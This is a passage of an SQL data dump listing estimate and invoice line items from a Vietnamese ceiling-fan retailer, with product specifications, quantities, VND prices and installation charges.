(876, 181, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt Black (Đen sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n', 1.00, 6800000.00, 'Cái', 1, 20, '', 0.00),
(877, 181, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(878, 275, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Maple Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt Black (Đen sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 1, 25, NULL, 0.00),
(879, 275, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(880, 182, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, '', 0.00),
(881, 276, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...<br />\r\nKiểm tra rung lắc, cân bằng cánh', 1.00, 350000.00, 'cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(882, 183, 'estimate', 'Haiku I 60 inch White with SenseME', 'Model: <br />\r\nSải cánh: 150cm (60 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Trắng <br />\r\nMàu cánh: Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA', 1.00, 31365000.00, '', 1, 0, '', 0.00),
(883, 183, 'estimate', 'Bộ đèn LED Haiku  I series', '', 1.00, 8800000.00, 'cái', 2, 0, '', 0.00),
(884, 183, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 3, 0, '', 0.00),
(885, 184, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6100000.00, '', 1, 0, '', 0.00),
(886, 184, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(887, 277, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Motor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6100000.00, '', 1, 0, NULL, 0.00),
(888, 277, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(889, 185, 'estimate', 'Quạt trần cánh lớn Powerful S3 sải cánh 4m3', '', 4.00, 83600000.00, '', 1, 0, '', 0.00),
(890, 278, 'invoice', 'Quạt trần cánh lớn Powerful S3 sải cánh 4m3', '', 4.00, 83600000.00, '', 1, 15, NULL, 0.00),
(891, 279, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k', 2.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1938/thumb_den-led.jpg', 0.00),
(892, 279, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 2.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(893, 186, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, '', 0.00),
(894, 187, 'estimate', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 2.00, 16900000.00, '', 1, 0, '', 0.00),
(895, 188, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Số cánh: 7 cánh, Aluminum<br />\r\nWeight: 18kg<br />\r\nCông suất: 84W<br />\r\nNoise: &lt;35 dB<br />\r\nSpeed: 95 RPM<br />\r\nPower source: 220-240 V', 1.00, 34800000.00, '', 1, 20, '', 0.00),
(896, 188, 'estimate', 'Nhân công lắp đặt quạt trần cánh lớn', 'Gồm giây điện 5m và Ống ruột gà', 1.00, 1000000.00, 'cái', 2, 0, '', 0.00),
(897, 189, 'estimate', 'Haiku Outdoor Black Aluminum', '', 2.00, 67650000.00, '', 1, 0, '', 0.00),
(898, 189, 'estimate', 'Nhân công lắp đặt quạt trần', '', 2.00, 0.00, 'cái', 2, 0, '', 0.00),
(899, 280, 'invoice', 'Haiku Outdoor Black Aluminum', '', 2.00, 67650000.00, '', 1, 0, NULL, 0.00),
(900, 280, 'invoice', 'Nhân công lắp đặt quạt trần', '', 2.00, 0.00, 'cái', 2, 0, NULL, 0.00),
(901, 190, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S   <br />\r\nProduct Name: POWERFUL SERIES 10   <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor, <br />\r\nSpeed (min/max): 10 / 50 RPM   <br />\r\nWeight: 120.86 kg   <br />\r\nMaximum Rated Current : 8.3 A   <br />\r\nPower consumption (max W): 1,050 W <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz   <br />\r\nFan Weight (trọng lượng): 120.86 kg <br />\r\nSound at max. Speed (độ ồn): ˜46 dB(A)   <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h)    <br />\r\nMax Affected Area: 2,612 m2   <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color  <br />\r\nColor: Airfoil:Silver , Winglet: Black     <br />\r\nMounting components: 1m Extension tube length <br />\r\nController: Knob Wall Controller mounted   <br />\r\nFan Diameter: 24ft (7.3m)   <br />\r\nBảo hành (Warranty): 03 years   <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 1.00, 109000000.00, '', 1, 0, '', 0.00),
(902, 190, 'estimate', 'Nhân công lắp đặt quạt trần ', '', 1.00, 6500000.00, 'cái', 2, 0, '', 0.00),
(903, 281, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S   <br />\r\nProduct Name: POWERFUL SERIES 10   <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor, <br />\r\nSpeed (min/max): 10 / 50 RPM   <br />\r\nWeight: 120.86 kg   <br />\r\nMaximum Rated Current : 8.3 A   <br />\r\nPower consumption (max W): 1,050 W <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz   <br />\r\nFan Weight (trọng lượng): 120.86 kg <br />\r\nSound at max. Speed (độ ồn): ˜46 dB(A)   <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h)    <br />\r\nMax Affected Area: 2,612 m2   <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color  <br />\r\nColor: Airfoil:Silver , Winglet: Black     <br />\r\nMounting components: 1m Extension tube length <br />\r\nController: Knob Wall Controller mounted   <br />\r\nFan Diameter: 24ft (7.3m)   <br />\r\nBảo hành (Warranty): 03 years   <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 1.00, 109000000.00, '', 1, 0, NULL, 0.00),
(904, 281, 'invoice', 'Nhân công lắp đặt quạt trần ', '', 1.00, 6500000.00, 'cái', 2, 0, NULL, 0.00),
(905, 282, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Số cánh: 7 cánh, Aluminum<br />\r\nWeight: 18kg<br />\r\nCông suất: 84W<br />\r\nNoise: &lt;35 dB<br />\r\nSpeed: 95 RPM<br />\r\nPower source: 220-240 V', 1.00, 34800000.00, '', 1, 20, NULL, 0.00),
(906, 282, 'invoice', 'Nhân công lắp đặt quạt trần cánh lớn', 'Gồm dây điện 5m và Ống ruột gà', 1.00, 1000000.00, 'cái', 2, 0, NULL, 0.00),
(907, 191, 'estimate', 'Quạt trần cổ điển MAREILLY 52 Black Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 16900000.00, '', 1, 20, '', 0.00),
(908, 191, 'estimate', 'Nhân công lắp đặt quạt trần', 'Chưa bao gồm dây điện và nguồn', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(909, 283, 'invoice', 'Quạt trần cổ điển MAREILLY 52 Black Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 16900000.00, '', 1, 20, NULL, 0.00),
(910, 283, 'invoice', 'Nhân công lắp đặt quạt trần', 'Đã bao gồm dây điện và nguồn<br />\r\nChi phí gia cố lại trần: 300.000đ', 1.00, 1300000.00, 'cái', 2, 0, NULL, 0.00),
(911, 192, 'estimate', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k', 1.00, 550000.00, '', 1, 0, '', 0.00),
(912, 192, 'estimate', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 2, 0, '', 0.00),
(913, 192, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 3, 0, '', 0.00),
(914, 284, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k', 1.00, 550000.00, '', 1, 0, NULL, 0.00),
(915, 284, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 2, 0, NULL, 0.00),
(917, 193, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, '', 0.00),
(918, 285, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(919, 194, 'estimate', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 10.00, 350000.00, '', 1, 0, '', 0.00),
(920, 286, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ tối (Dark Wood)<br />\r\nTuỳ chọn đèn: N/A (không có)', 6.00, 6800000.00, 'cái', 1, 40, 'https://hgphome.com/uploads/items/1944/thumb_abacus-white_crm_img.jpg', 0.00),
(921, 195, 'estimate', 'Quạt trần KATRINA Gray Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ (Dark Walnut)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 5200000.00, 'Cái', 1, 0, '', 0.00),
(922, 195, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(923, 287, 'invoice', 'Quạt trần KATRINA Gray Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ (Dark Walnut)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 5200000.00, 'Cái', 1, 0, NULL, 0.00),
(924, 287, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(925, 196, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n', 1.00, 4080000.00, 'Cái', 1, 0, '', 0.00),
(926, 288, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 4080000.00, 'Cái', 1, 0, NULL, 0.00),
(927, 289, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 1500000.00, 'cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(928, 197, 'estimate', 'Haiku L 44 inch Black', 'Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 15760000.00, '', 1, 0, '', 0.00),
(929, 197, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(930, 290, 'invoice', 'Haiku L 44 inch Black', 'Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Đen<br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 15760000.00, '', 1, 0, NULL, 0.00),
(931, 290, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(933, 198, 'estimate', 'Haiku 60 inch Caramel Bamboo, Low Profile Black', 'Sải cánh 150cm (60 inch)       <br />\r\nMàu cánh: Caramel Bamboo        <br />\r\nMàu thân :  Black       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA ', 2.00, 42480000.00, 'cái', 1, 15, '', 0.00),
(936, 199, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', '', 3.00, 27000000.00, '', 1, 0, '', 0.00),
(937, 200, 'estimate', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa vân gỗ<br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC).  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 4000000.00, '', 1, 0, '', 0.00),
(938, 291, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', '', 3.00, 27000000.00, '', 1, 0, NULL, 0.00),
(939, 292, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa vân gỗ<br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC).  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 4000000.00, '', 1, 0, NULL, 0.00),
(940, 201, 'estimate', 'Haiku L 52 inch White - Caramel', 'Sải cánh 132cm (52inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nMàu cánh: Caramel   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 23800000.00, 'bộ', 1, 25, '', 0.00),
(941, 201, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc lắp đặt trần tấm thạch cao<br />\r\nTrần chung cư (bê tông/ tấm trần &lt;40cm)<br />\r\n<br />\r\n', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(943, 293, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc lắp đặt trần tấm thạch cao<br />\r\nTrần chung cư (bê tông/ tấm trần &lt;40cm)', 1.00, 500000.00, 'cái', 1, 0, NULL, 0.00),
(945, 202, 'estimate', 'Haiku I 52 inch White with SenseME', 'Model: <br />\r\nSải cánh: 132cm (52 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Đem/Trắng <br />\r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA', 1.00, 35200000.00, '', 1, 0, '', 0.00),
(947, 294, 'invoice', 'Haiku 52 inch Cocoa Bamboo, Universal Black', 'Sải cánh 132cm (52 inch)        <br />\r\nMàu cánh: Cocoa Bamboo         <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA', 1.00, 42900000.00, 'cái', 1, 10, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(948, 294, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(949, 203, 'estimate', 'Haiku 60 inch Caramel Bamboo, Low Profile White', 'Sải cánh 132cm (52 inch)        <br />\r\nMàu cánh: Caramel Bamboo         <br />\r\nMàu thân : Low Profile        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA', 1.00, 47200000.00, 'cái', 1, 0, '', 0.00),
(950, 203, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(954, 293, 'invoice', 'Haiku 60 inch Caramel Bamboo, Universal White', 'Sải cánh 150cm (60 inch)         <br />\r\nMàu cánh: Caramel Bamboo          <br />\r\nMàu thân : Universal White <br />\r\nĐộng cơ EC, công suất 29.3W         <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm         <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)         <br />\r\nBộ đèn LED tuỳ chọn thêm         <br />\r\nThương hiệu: Haiku/USA', 1.00, 47200000.00, 'cái', 2, 20, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(955, 295, 'invoice', 'Xuất Bảo hành Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 0.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(956, 296, 'invoice', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, 'cái', 1, 25, 'https://hgphome.com/uploads/items/1943/thumb_katrina_maple_wood.jpg', 0.00),
(957, 296, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(958, 297, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 4.00, 6800000.00, 'cái', 1, 30, 'https://hgphome.com/uploads/items/1944/thumb_abacus-white_crm_img.jpg', 0.00),
(961, 204, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br 